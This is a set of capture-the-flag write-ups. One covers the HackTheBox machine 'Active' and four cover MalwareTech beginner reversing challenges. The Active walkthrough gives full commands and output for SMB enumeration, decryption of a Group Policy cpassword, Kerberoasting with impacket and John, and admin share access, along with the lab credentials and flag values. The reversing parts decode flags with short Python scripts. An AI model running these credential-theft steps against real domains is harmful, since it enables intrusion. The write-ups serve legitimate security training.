Hackthebox Active Writeup


Explanation

Hackthebox is a website that hosts a set of vulnerable machines inside its own VPN. This is a write-up of the machine “Active” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.100 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-14 09:14 EEST
Nmap scan report for 10.10.10.100
Host is up (0.036s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2018-09-14 06:11:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -4m14s, deviation: 0s, median: -4m14s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2018-09-14 09:12:21
|_  start_date: 2018-09-11 14:34:52

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.30 seconds

What we have to notice is the clock skew between our host and Active.
We will have to adjust our host's time manually later for Active Directory enumeration, because Kerberos rejects requests from clients whose clock differs from the DC by more than the domain's tolerance (5 minutes by default).

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.100:47001/

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.100:47001/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Timeout      : 10s
=====================================================
2018/09/14 23:40:33 Starting gobuster
=====================================================
=====================================================
2018/09/15 00:06:24 Finished
=====================================================

SMB Share listing:

root@kali:~# smbclient -L 10.10.10.100
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Replication     Disk      
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

2. Getting User

According to the result above, anonymous login is allowed and some of the SMB shares are readable.
By enumerating them, we can find an interesting file.

root@kali:~# smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  active.htb                          D        0  Sat Jul 21 13:37:44 2018

		10459647 blocks of size 4096. 4924822 blocks available

smb: \active.htb\policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\machine\Preferences\groups\> dir
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 23:46:06 2018

		10459647 blocks of size 4096. 4924822 blocks available

We can find a domain user credential in Groups.xml:

root@kali:~# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Using the “gpp-decrypt” command, we can recover the password for user “active.htb\SVC_TGS”. The cpassword value is AES-encrypted with a key that Microsoft published in its documentation, which is why it can be decrypted offline by anyone who can read SYSVOL.

root@kali:~# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

Now we have one credential to get into Active:

user:       active.htb\SVC_TGS
password:   GPPstillStandingStrong2k18
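As an added example (not part of the original write-up), the following script audits a Group Policy Preference XML file for cached cpassword attributes, the way a defender would sweep SYSVOL. It uses the Groups.xml recovered above and only decodes the ciphertext to show it is well-formed AES data; the actual decryption with the published key is what gpp-decrypt does.

```python
#!/usr/bin/env python3
"""Audit Group Policy Preference XML (SYSVOL) for cached cpassword attributes."""
import base64
import xml.etree.ElementTree as ET

# Groups.xml as recovered from the Replication share above (copied from the page).
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
"""


def find_cpasswords(xml_text):
    """Return one finding per element that carries a cpassword attribute.

    GPP stores the value in <Properties cpassword="..."> under Users, Drives,
    ScheduledTasks, Services and DataSources, so every tag is checked.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if cpassword is None:
            continue
        findings.append({
            "tag": elem.tag,
            # Users carry userName; scheduled tasks/services use runAs instead.
            "userName": elem.get("userName") or elem.get("runAs") or "",
            "cpassword": cpassword,
            "action": elem.get("action", ""),
        })
    return findings


def cpassword_ciphertext(cpassword):
    """Decode the cpassword value to the raw AES-256-CBC ciphertext.

    GPP strips the base64 '=' padding, so it must be restored before decoding.
    A well-formed value is always a whole number of 16-byte AES blocks.
    """
    padded = cpassword + "=" * (-len(cpassword) % 4)
    ciphertext = base64.b64decode(padded)
    if len(ciphertext) % 16:
        raise ValueError("cpassword is not a multiple of the AES block size")
    return ciphertext


if __name__ == "__main__":
    for f in find_cpasswords(GROUPS_XML):
        size = len(cpassword_ciphertext(f["cpassword"]))
        print(f"{f['tag']}: {f['userName']} (action {f['action']}) -> {size}-byte ciphertext")
```

Run it against every *.xml under a domain's Policies directory; any hit means the password is recoverable by every authenticated domain user.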

We can use the credential for further enumeration of the SMB shares.
In “USERS”, we can find user.txt.

root@kali:~# smbclient -W active.htb -U SVC_TGS //10.10.10.100/USERS
Enter ACTIVE.HTB\SVC_TGS's password:  # GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 17:39:20 2018
  ..                                 DR        0  Sat Jul 21 17:39:20 2018
  Administrator                       D        0  Mon Jul 16 13:14:21 2018
  All Users                         DHS        0  Tue Jul 14 08:06:44 2009
  Default                           DHR        0  Tue Jul 14 09:38:21 2009
  Default User                      DHS        0  Tue Jul 14 08:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 07:57:55 2009
  Public                             DR        0  Tue Jul 14 07:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 18:16:32 2018

		10459647 blocks of size 4096. 4939173 blocks available

smb: \> cd SVC_TGS/desktop
smb: \SVC_TGS\desktop\> dir
  .                                   D        0  Sat Jul 21 18:14:42 2018
  ..                                  D        0  Sat Jul 21 18:14:42 2018
  user.txt                            A       34  Sat Jul 21 18:06:25 2018

		10459647 blocks of size 4096. 4924822 blocks available
smb: \SVC_TGS\desktop\>

We can download user.txt with the get command.

root@kali:~# cat user.txt 
86d67d8ba232bb6a254aa4d10159e983

3. Getting root

Then, we continue the enumeration. To enumerate the domain's SIDs (users and groups) on Active, we can use lookupsid.py from impacket.

root@kali:~# ./lookupsid.py active.htb/SVC_TGS:GPPstillStandingStrong2k18@10.10.10.100
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.100
[*] StringBinding ncacn_np:10.10.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-405608879-3187717380-1996298813
498: ACTIVE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ACTIVE\Administrator (SidTypeUser)
501: ACTIVE\Guest (SidTypeUser)
502: ACTIVE\krbtgt (SidTypeUser)
512: ACTIVE\Domain Admins (SidTypeGroup)
513: ACTIVE\Domain Users (SidTypeGroup)
514: ACTIVE\Domain Guests (SidTypeGroup)
515: ACTIVE\Domain Computers (SidTypeGroup)
516: ACTIVE\Domain Controllers (SidTypeGroup)
517: ACTIVE\Cert Publishers (SidTypeAlias)
518: ACTIVE\Schema Admins (SidTypeGroup)
519: ACTIVE\Enterprise Admins (SidTypeGroup)
520: ACTIVE\Group Policy Creator Owners (SidTypeGroup)
521: ACTIVE\Read-only Domain Controllers (SidTypeGroup)
553: ACTIVE\RAS and IAS Servers (SidTypeAlias)
571: ACTIVE\Allowed RODC Password Replication Group (SidTypeAlias)
572: ACTIVE\Denied RODC Password Replication Group (SidTypeAlias)
1000: ACTIVE\DC$ (SidTypeUser)
1101: ACTIVE\DnsAdmins (SidTypeAlias)
1102: ACTIVE\DnsUpdateProxy (SidTypeGroup)
1103: ACTIVE\SVC_TGS (SidTypeUser)

Then, we can request Kerberos service tickets (TGS) for every account that has an SPN with GetUserSPNs.py:

root@kali:~# python GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 22:06:40  2018-07-30 20:17:40

$krb5tgs$23$*Administrator$ACTIVE.HTB$activeCIFS~445*$00f28190b890c746887da2466a9ede5f$...

To crack this hash, we cannot use the John the Ripper package that ships with Kali Linux.
It does not recognize this krb5tgs format as a hash, so we have to build the “bleeding-jumbo” branch of John from the official GitHub repository.

root@kali:~# git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
Cloning into 'john'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 87491 (delta 4), reused 5 (delta 1), pack-reused 87475
Receiving objects: 100% (87491/87491), 106.91 MiB | 10.98 MiB/s, done.
Resolving deltas: 100% (68479/68479), done.
root@kali:~# cd john/src/
root@kali:~/john/src# ./configure && make -s clean && make -sj4
checking build system type... x86_64-unknown-linux-gnu
checking host system type... x86_64-unknown-linux-gnu
~~~

root@kali:~/john/src# cd ../run/
root@kali:~/john/run# ./john ../../active.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2019-02-18 12:25) 0.2469g/s 2602Kp/s 2602Kc/s 2602KC/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Now we have the password for the Administrator account.
Since C$ is a share that exposes the entire C drive, we can retrieve root.txt by accessing it with smbclient.

root@kali:~# smbclient -W active.htb -U Administrator //10.10.10.100/C$
Enter ACTIVE.HTB\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Content of root.txt:

root@kali:~# cat root.txt 
b5fc76d1d6b91d77b2fbf2d54d0f708b

4. References

https://room362.com/post/2016/kerberoast-pt1/
https://room362.com/post/2016/kerberoast-pt2/

MalwareTech Beginner Malware Reversing Challenges shellcode1 Writeup

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

MalwareTech hosts several beginner malware reversing challenges on this page.
This is a write-up of “shellcode1”.

shellcode1.exe contains a flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening the shellcode1.exe

Let’s run shellcode1.exe.
As the following picture shows, it prints an MD5 hash of the flag.

placeholder

Just like in the strings challenges, we have to recover the original text behind this MD5 hash.

2. Analyzing assembly code

As in the last challenge, the function MD5:digestString is used to hash the original text.

placeholder

Its argument is at offset “Str”, which must be the text we are looking for.
However, it is still obfuscated at this point and does not look like anything meaningful.

placeholder

In this assembly code, we find “offset Str” one more time.

placeholder

As we can see, it gets the length of Str and stores it in [ecx+4].
Next, we need to figure out what ecx is.

placeholder

It looks like the value of ecx is the return value of HeapAlloc.

DECLSPEC_ALLOCATOR LPVOID HeapAlloc(
  HANDLE hHeap,  // A handle to the heap from which the memory will be allocated. This handle is returned by the HeapCreate or GetProcessHeap function.
  DWORD  dwFlags,  // The heap allocation options.
  SIZE_T dwBytes  // The number of bytes to be allocated.
);

The return value is a pointer to the allocated memory block.
This means that after the instructions below, the values at ecx and ecx+4 are:

ecx: pointer to allocated heap
ecx+4: length of Str

Then we still have three calls left to analyze.

call    ds:VirtualAlloc
call    memcpy
call    [ebp+Dst]

It looks like the return value of VirtualAlloc is stored in [ebp+Dst]. placeholder According to the official documentation, the arguments of VirtualAlloc are:

LPVOID VirtualAlloc(
  LPVOID lpAddress,        // The starting address of the region to allocate. 
  SIZE_T dwSize,           // The size of the region, in bytes.
  DWORD flAllocationType,  // The type of memory allocation.
  DWORD flProtect          // The memory protection for the region of pages to be allocated.
);

and in this case, VirtualAlloc is called like

VirtualAlloc(0, 0Dh, 1000h, 40h);

1000h is MEM_COMMIT and 40h is PAGE_EXECUTE_READWRITE, so this commits a 13-byte region that is both writable and executable: the classic setup for copying a stub of code somewhere and jumping to it.

Next, look at memcpy.

void *memcpy(
  void *destination,    // Pointer to the destination array where the content is to be copied, type-cast to a pointer of type void*.
  const void *source,   // Pointer to the source of data to be copied, type-cast to a pointer of type const void*.
  size_t num            // Number of bytes to copy.
);

This means that, in this case, memcpy is called like

memcpy([ebp+Dst], offset unk_404068, 0Dh)

So the unknown function called through [ebp+Dst] is the 13 bytes copied from offset unk_404068. At first glance it looks like opaque data, but pressing the C key in IDA converts the bytes to code.

placeholder

It looks like this code does the following:

1. put value of [esi] into edi
2. put value of [esi+4] into ecx
3. Rotate left the values of esi 5 times
4. Do this procedure for esi length + 4 times

At this point the value of esi is [ebp+var_4], i.e. the heap block allocated earlier, which holds the pointer to Str and its length.
So the function operates on offset Str through that heap block.
In summary, Str as modified by the function above is the original text.

3. Decryption

Now we know what we have to do.
After selecting the data we need, we can export it with “Edit->Export data” (or Shift+E) and choose the C hex format for use in Python. placeholder

Then, what we have to do is write a script for the decoding.

#! /usr/bin/python3

# Bytes exported from IDA at offset Str ("Edit->Export data", C hex format).
flag = bytearray([0x32, 0x62, 0x0A, 0x3A, 0xDB, 0x9A, 0x42, 0x2A, 0x62, 0x62,
                  0x1A, 0x7A, 0x22, 0x2A, 0x69, 0x4A, 0x9A, 0x72, 0xA2, 0x69,
                  0x52, 0xAA, 0x9A, 0xA2, 0x69, 0x32, 0x7A, 0x92, 0x69, 0x2A,
                  0xC2, 0x82, 0x62, 0x7A, 0x4A, 0xA2, 0x9A, 0xEB, 0x00, 0x00])


def rol(val, r_bits, max_bits):
    """Rotate val left by r_bits inside a max_bits-wide word (rol al, 5 in x86)."""
    r_bits %= max_bits
    mask = (1 << max_bits) - 1
    return ((val << r_bits) & mask) | ((val & mask) >> (max_bits - r_bits))


# Replay what the shellcode does: rotate every byte of Str left by 5 bits.
for i in range(len(flag)):
    flag[i] = rol(flag[i], 5, 8)

# Drop the two trailing NUL bytes before printing.
print(flag.rstrip(b"\x00").decode())

Executing this script gives us the original text.

root@kali:~# ./rol.py 
FLAG{SHELLCODE-ISNT-JUST-FOR-EXPLOITS}
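The script above already knows the rotation count from reading the shellcode. As an added example that is not part of the original write-up, the following generalizes it: when the stub is harder to read, try all seven non-trivial 8-bit rotations and keep the one that yields printable text with the expected prefix. The blob is the same data as in rol.py.

```python
#!/usr/bin/env python3
"""Recover an unknown per-byte rotation from an obfuscated blob (shellcode1)."""

# Copy of the bytes exported from IDA at offset Str (same values as rol.py above).
BLOB = bytes([0x32, 0x62, 0x0A, 0x3A, 0xDB, 0x9A, 0x42, 0x2A, 0x62, 0x62,
              0x1A, 0x7A, 0x22, 0x2A, 0x69, 0x4A, 0x9A, 0x72, 0xA2, 0x69,
              0x52, 0xAA, 0x9A, 0xA2, 0x69, 0x32, 0x7A, 0x92, 0x69, 0x2A,
              0xC2, 0x82, 0x62, 0x7A, 0x4A, 0xA2, 0x9A, 0xEB, 0x00, 0x00])


def rol8(value, count):
    """8-bit rotate left, i.e. what `rol al, imm8` does in the shellcode stub."""
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF


def apply_rotation(blob, count):
    """Rotate every byte by `count` bits and drop the trailing NUL terminator(s)."""
    return bytes(rol8(b, count) for b in blob).rstrip(b"\x00")


def is_printable(data):
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def candidates(blob):
    """All seven non-trivial rotations, for manual review when no prefix is known."""
    return {count: apply_rotation(blob, count) for count in range(1, 8)}


def recover_rotation(blob, prefix=b"FLAG{"):
    """Return (count, plaintext) for the first rotation that yields fully printable
    text starting with `prefix`, or None when no single rotation fits (a sign that
    the stub does something other than a plain rotate)."""
    for count, text in candidates(blob).items():
        if text.startswith(prefix) and is_printable(text):
            return count, text
    return None


if __name__ == "__main__":
    hit = recover_rotation(BLOB)
    if hit is None:
        print("no single-rotation decoding found; inspect candidates() by hand")
    else:
        print(f"rol {hit[0]}: {hit[1].decode()}")
```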

MalwareTech Beginner Malware Reversing Challenges Strings3 Writeup

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0
  • Other: Resource Hacker v5.1.7

Explanation

MalwareTech hosts several beginner malware reversing challenges on this page.
This is a write-up of “Strings3”.

strings3.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA and Resource Hacker

Let’s open strings3.exe with IDA and search for the flag. According to the Strings window, there is no encrypted flag in sight. placeholder So we can guess that this executable loads the flag from somewhere else.
We can use “Resource Hacker” to inspect resources that IDA does not show in its listing. placeholder As we can see, there are far too many possible flags, and we still have to figure out which one is correct.

2. Identify the correct flag

To identify the correct flag, we can take advantage of these functions. placeholder According to the official documentation for “LoadStringA”, it takes four arguments.

int LoadStringA(
  HINSTANCE hInstance, // A handle to an instance of the module whose executable file contains the string resource.
  UINT      uID, // The identifier of the string to be loaded.
  LPSTR     lpBuffer, // The buffer to receive the string or a read-only pointer to the string resource itself.
  int       cchBufferMax // The size of the buffer, in characters.
);

This means that in strings3.exe, LoadStringA is called like this:

int LoadStringA(0, edx, ecx, 0x3FF)

So we have to figure out the value of edx.
To do that, we focus on the following instructions. placeholder Let’s look at the values of eax and edx. placeholder We can work out the value of each register with the Python interpreter.

root@kali:~# python
Python 2.7.15+ (default, Feb  3 2019, 13:13:16) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 1 << 8 # shl edx, 8
256
>>> 1 << 4 # shl eax, 4
16
>>> 256 | 16 # or eax, edx
272
>>>  

According to this, after the “or eax, edx” instruction, the value of eax is 272.
This value is stored in [ebp+var_4] and then moved to edx. placeholder So the edx argument of LoadStringA, the string ID, is 272. If we look up entry 272 in the string table, we find the correct flag. placeholder
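As an added example (not part of the original write-up), the following script replays the ID computation and shows how that ID maps onto the PE string table: RT_STRING resources are stored in blocks of 16 strings, so ID 272 is entry 0 of block 18, which is how Resource Hacker numbers it. The block bytes are constructed here and the flag value is a placeholder, not the real challenge answer.

```python
#!/usr/bin/env python3
"""Map a LoadStringA ID to its RT_STRING block and decode the block (strings3)."""
import struct

STRINGS_PER_BLOCK = 16


def loadstring_uid(edx=1, eax=1):
    """Replay the shl/or sequence seen in strings3.exe: (edx << 8) | (eax << 4)."""
    return (edx << 8) | (eax << 4)


def locate_string_resource(uid):
    """String ID -> (RT_STRING block ID, index inside the block)."""
    return uid // STRINGS_PER_BLOCK + 1, uid % STRINGS_PER_BLOCK


def build_string_table_block(entries):
    """Encode 16 strings the way a string table block is stored in the PE."""
    if len(entries) != STRINGS_PER_BLOCK:
        raise ValueError("a string table block holds exactly 16 entries")
    block = b""
    for s in entries:
        # WORD character count followed by UTF-16LE text; empty slots are a 0 WORD.
        block += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return block


def parse_string_table_block(data):
    """Decode an RT_STRING block back into its 16 entries."""
    entries, offset = [], 0
    for _ in range(STRINGS_PER_BLOCK):
        (length,) = struct.unpack_from("<H", data, offset)
        offset += 2
        entries.append(data[offset:offset + 2 * length].decode("utf-16-le"))
        offset += 2 * length
    return entries


def resolve_flag(block_data, uid):
    """What LoadStringA(hInstance, uid, ...) would copy into the caller's buffer."""
    _, index = locate_string_resource(uid)
    return parse_string_table_block(block_data)[index]


# Constructed block 18: slot 0 carries a placeholder flag, the rest are decoys.
UID = loadstring_uid()
BLOCK_ID, INDEX = locate_string_resource(UID)
SAMPLE_BLOCK = build_string_table_block(
    ["FLAG{CONSTRUCTED-EXAMPLE}" if i == INDEX else f"decoy {i}" for i in range(16)])

if __name__ == "__main__":
    print(f"ID {UID} lives in string table block {BLOCK_ID}, entry {INDEX}")
    print(resolve_flag(SAMPLE_BLOCK, UID))
```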

MalwareTech Beginner Malware Reversing Challenges Strings2 Writeup

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

MalwareTech hosts several beginner malware reversing challenges on this page.
This is a write-up of “Strings2”.

strings2.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA

When we open strings2.exe with IDA, we see a large number of local variables. placeholder They are followed by a run of mov instructions. placeholder The trailing “h” tells us that these immediates are hex numbers.

2. Translate hex to ascii

We can write a Python script that translates these hex codes into ASCII characters.

root@kali:~# cat strings2.py 
#! /usr/bin/python3

import binascii

HEX = '464C41477B535441434B2D535452494E47532D4152452D424553542D535452494E47537D'


def main():
    print(binascii.a2b_hex(HEX))


if __name__ == "__main__":
    main()

Let’s execute the Python script.
It gives us the flag for this challenge.

root@kali:~# ./strings2.py 
b'FLAG{STACK-STRINGS-ARE-BEST-STRINGS}'
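The hex string above was collected from the mov immediates by hand. As an added example that is not part of the original write-up, the following script automates that step from an IDA-style listing: it orders the stores by stack offset, handles mixed byte/dword widths (little-endian), and stops at the NUL terminator. The listing is constructed for this example and encodes the same flag.

```python
#!/usr/bin/env python3
"""Rebuild a stack string from the mov immediates in an IDA listing (strings2)."""
import re

# Constructed listing in IDA syntax. The immediates encode the strings2 flag, but
# the stores are deliberately out of order and of mixed width to exercise the parser.
LISTING = """
mov     dword ptr [ebp+var_2C], 4154537Bh
mov     dword ptr [ebp+var_30], 47414C46h
mov     dword ptr [ebp+var_28], 532D4B43h
mov     dword ptr [ebp+var_24], 4E495254h
mov     dword ptr [ebp+var_20], 412D5347h
mov     dword ptr [ebp+var_1C], 422D4552h
mov     dword ptr [ebp+var_18], 2D545345h
mov     dword ptr [ebp+var_14], 49525453h
mov     byte ptr [ebp+var_10], 4Eh
mov     byte ptr [ebp+var_F], 47h
mov     byte ptr [ebp+var_E], 53h
mov     byte ptr [ebp+var_D], 7Dh
mov     byte ptr [ebp+var_C], 0
"""

WIDTH = {"byte": 1, "word": 2, "dword": 4}
MOV_RE = re.compile(
    r"mov\s+(?:(byte|word|dword)\s+ptr\s+)?\[ebp\+var_([0-9A-Fa-f]+)\],\s*([0-9A-Fa-f]+h|\d+)")


def parse_stack_stores(listing):
    """Map each stack address (relative to ebp) to the byte stored there."""
    cells = {}
    for width, var, imm in MOV_RE.findall(listing):
        size = WIDTH[width or "dword"]      # assume dword when no size prefix is written
        value = int(imm[:-1], 16) if imm.endswith("h") else int(imm)
        base = -int(var, 16)                 # var_30 lives at ebp-0x30
        for i, b in enumerate(value.to_bytes(size, "little")):
            cells[base + i] = b              # little-endian: low byte at the low address
    return cells


def recover_stack_strings(listing, min_len=4):
    """Walk the stores in address order; emit printable runs ended by NUL or a gap."""
    cells = parse_stack_stores(listing)
    strings, run, prev = [], bytearray(), None
    for addr in sorted(cells):
        b = cells[addr]
        contiguous = prev is None or addr == prev + 1
        if not contiguous or not 0x20 <= b < 0x7F:
            if len(run) >= min_len:
                strings.append(run.decode("ascii"))
            run = bytearray()
        if 0x20 <= b < 0x7F:
            run.append(b)
        prev = addr
    if len(run) >= min_len:
        strings.append(run.decode("ascii"))
    return strings


if __name__ == "__main__":
    for s in recover_stack_strings(LISTING):
        print(s)
```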

MalwareTech Beginner Malware Reversing Challenges Strings1 Writeup

Environment

  • Host OS: Kali linux 2018.4
  • Guest OS: Windows 7 Home Basic
  • Virtualization: Virtualbox 5.2.22
  • Debugger: IDA Pro 7.0

Explanation

MalwareTech hosts several beginner malware reversing challenges on this page.
This is a write-up of “Strings1” on that website.

strings1.exe contains an un-encrypted flag stored within the executable. When run, the program will output an MD5 hash of the flag but not the original. Can you extract the flag?

Solution

1. Opening with IDA

So we have to find an unencrypted flag inside a Windows executable, strings1.exe.
As written on the challenge web page, we don’t need to run the executable.
By opening it with IDA, we can see the overall structure.
placeholder To find strings, we can go to the Strings window
(View->Open Subviews->Strings or Shift+F12). placeholder As we can see, there are far too many possible flags.

2. Analysing assembly code

placeholder By reading the disassembly, we find that after a few lines of standard instructions, we have the instructions below.
placeholder It looks like it is hashing the characters at off_432294.
By double-clicking the operand, we can see the value at that address. placeholder This is the flag we have to find.